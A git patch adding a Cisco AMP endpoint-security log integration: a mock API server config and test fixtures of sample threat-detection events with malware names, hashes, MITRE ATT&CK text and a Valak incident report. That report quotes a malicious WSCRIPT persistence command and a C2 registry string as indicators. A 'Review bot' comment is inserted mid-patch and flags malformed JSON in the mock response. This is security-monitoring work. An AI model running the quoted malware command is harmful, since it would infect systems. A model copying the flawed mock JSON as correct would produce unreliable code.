From 300d8eb0c771af4893e5da5797e4ffe95da35e2f Mon Sep 17 00:00:00 2001 
From: Alex Resnick Date: Sun, 12 Sep 2021 19:46:52 +0000 Subject: [PATCH] #1624: Add Cisco AMP package --- packages/cisco_amp/_dev/build/build.yml | 3 + packages/cisco_amp/_dev/build/docs/README.md | 16 + .../_dev/deploy/docker/docker-compose.yml | 14 + .../_dev/deploy/docker/files/config.yml | 30 + packages/cisco_amp/changelog.yml | 6 + .../_dev/test/pipeline/cisco_amp2.ndjson.log | 42 + .../cisco_amp2.ndjson.log-expected.json | 3840 ++++++++ .../_dev/test/pipeline/cisco_amp3.ndjson.log | 45 + .../cisco_amp3.ndjson.log-expected.json | 3825 ++++++++ .../_dev/test/pipeline/cisco_amp4.ndjson.log | 100 + .../cisco_amp4.ndjson.log-expected.json | 8107 +++++++++++++++++ .../_dev/test/pipeline/cisco_amp5.ndjson.log | 62 + .../cisco_amp5.ndjson.log-expected.json | 5084 +++++++++++ .../_dev/test/pipeline/cisco_amp6.ndjson.log | 53 + .../cisco_amp6.ndjson.log-expected.json | 4310 +++++++++ .../_dev/test/pipeline/cisco_amp7.ndjson.log | 49 + .../cisco_amp7.ndjson.log-expected.json | 3968 ++++++++ .../test/pipeline/test-cisco_amp1.ndjson.log | 49 + .../test-cisco_amp1.ndjson.log-expected.json | 4041 ++++++++ .../_dev/test/pipeline/test-common-config.yml | 5 + .../_dev/test/system/test-default-config.yml | 10 + .../log/agent/stream/httpjson.yml.hbs | 71 + .../elasticsearch/ingest_pipeline/default.yml | 475 + .../data_stream/log/fields/agent.yml | 198 + .../data_stream/log/fields/base-fields.yml | 46 + .../cisco_amp/data_stream/log/fields/ecs.yml | 84 + .../data_stream/log/fields/fields.yml | 292 + .../cisco_amp/data_stream/log/manifest.yml | 92 + .../data_stream/log/sample_event.json | 75 + packages/cisco_amp/docs/README.md | 236 + packages/cisco_amp/img/cisco.svg | 1 + packages/cisco_amp/manifest.yml | 28 + 32 files changed, 35257 insertions(+) create mode 100644 packages/cisco_amp/_dev/build/build.yml create mode 100644 packages/cisco_amp/_dev/build/docs/README.md create mode 100644 packages/cisco_amp/_dev/deploy/docker/docker-compose.yml create mode 100644 
packages/cisco_amp/_dev/deploy/docker/files/config.yml create mode 100644 packages/cisco_amp/changelog.yml create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml create mode 100644 packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs create mode 100644 packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml create mode 100644 packages/cisco_amp/data_stream/log/fields/agent.yml create mode 
100644 packages/cisco_amp/data_stream/log/fields/base-fields.yml
create mode 100644 packages/cisco_amp/data_stream/log/fields/ecs.yml
create mode 100644 packages/cisco_amp/data_stream/log/fields/fields.yml
create mode 100644 packages/cisco_amp/data_stream/log/manifest.yml
create mode 100644 packages/cisco_amp/data_stream/log/sample_event.json
create mode 100644 packages/cisco_amp/docs/README.md
create mode 100644 packages/cisco_amp/img/cisco.svg
create mode 100644 packages/cisco_amp/manifest.yml
diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_amp/_dev/build/build.yml
new file mode 100644
index 00000000000..a138b554aa0
--- /dev/null
+++ b/packages/cisco_amp/_dev/build/build.yml
@@ -0,0 +1,3 @@
+dependencies:
+ ecs:
+ reference: git@1.11
diff --git a/packages/cisco_amp/_dev/build/docs/README.md b/packages/cisco_amp/_dev/build/docs/README.md
new file mode 100644
index 00000000000..2d934ee3a94
--- /dev/null
+++ b/packages/cisco_amp/_dev/build/docs/README.md
@@ -0,0 +1,16 @@
+# Cisco AMP Integration
+
+This integration is for Cisco AMP logs. It includes the following
+datasets for receiving logs over syslog or read from a file:
+
+- `log` dataset: supports Cisco AMP logs.
+
+## Logs
+
+### AMP
+
+The `log` dataset collects Cisco AMP logs.
+
+{{event "log"}}
+
+{{fields "log"}}
diff --git a/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml b/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
new file mode 100644
index 00000000000..a438beca546
--- /dev/null
+++ b/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
@@ -0,0 +1,14 @@
+version: '2.3'
+services:
+ amp:
+ image: docker.elastic.co/observability/stream:v0.5.0
+ ports:
+ - 8080
+ volumes:
+ - ./files:/files:ro
+ environment:
+ PORT: 8080
+ command:
+ - http-server
+ - --addr=:8080
+ - --config=/files/config.yml
diff --git a/packages/cisco_amp/_dev/deploy/docker/files/config.yml b/packages/cisco_amp/_dev/deploy/docker/files/config.yml
new file mode 100644
index 00000000000..12dfd297f2c
--- /dev/null
+++ b/packages/cisco_amp/_dev/deploy/docker/files/config.yml
@@ -0,0 +1,30 @@
+rules:
+ - path: /v1/events
+ methods: ["GET"]
+ request_headers:
+ authorization: Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg=
+ query_params:
+ offset: "{offset:.*}"
+ limit: "{limit:.*}"
+ start_date: "{start_date:.*}"
+ responses:
+ - status_code: 200
+ body: |-
+ {
+ "version": "v1.2.0",
+ "metadata": {
+ "links": {
+ "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset=limit={{ .request.vars.offset }}",
+ },
+ "results": {
+ "total": 4,
+ "current_item_count": 1,
+ "index": 0,
+ "items_per_page": 1
+ }
+ },
+ "data": [
+ {"id":6180352115244794000,"timestamp":1582222838,"timestamp_nanoseconds":279000000,"date":"2020-02-20T18:20:38+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","group_guids":["6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"],"severity":"Medium","computer":{"connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","hostname":"Demo_Upatre","external_ip":"69.226.122.127","user":"A@TEMPLATE-W7X86","active":true,"network_addresses":[{"ip":"230.122.135.241","mac":"3f:1e:b2:28:25:24"}],"links":{"computer":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72","trajectory":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72/trajectory","group":"https://api.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","s
ha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}},
+ {"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}
+ ]
+ }
diff --git a/packages/cisco_amp/changelog.yml b/packages/cisco_amp/changelog.yml
new file mode 100644
index 00000000000..0b98c79f61c
--- /dev/null
+++ b/packages/cisco_amp/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.0.1"
+ changes:
+ - description: Initial migration from Filebeat Module
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/
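Review bot: The mock response under `body: |-` in config.yml is not well-formed JSON: the `"self"` entry inside `"links"` is followed by a trailing comma before the closing `},`, and the link itself reads `&offset=limit={{ .request.vars.offset }}`, which repeats the `limit=` key where `offset=` was meant. A strict decoder rejects the trailing comma, so if the httpjson input parses this page strictly (likely, but not visible here) the system test would never receive a usable response; the fix is to drop the comma and write `"self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset={{ .request.vars.offset }}"`. The `"results"` block also reports `"current_item_count": 1` and `"items_per_page": 1` while `"data"` carries two items, which is harmless for the mock but misleading as a fixture for pagination logic. The `authorization: Basic …` match is a constructed test credential and is fine as long as the system test config supplies the same pair.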
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
new file mode 100644
index 00000000000..ae6c21d78ff
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
@@ -0,0 +1,42 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
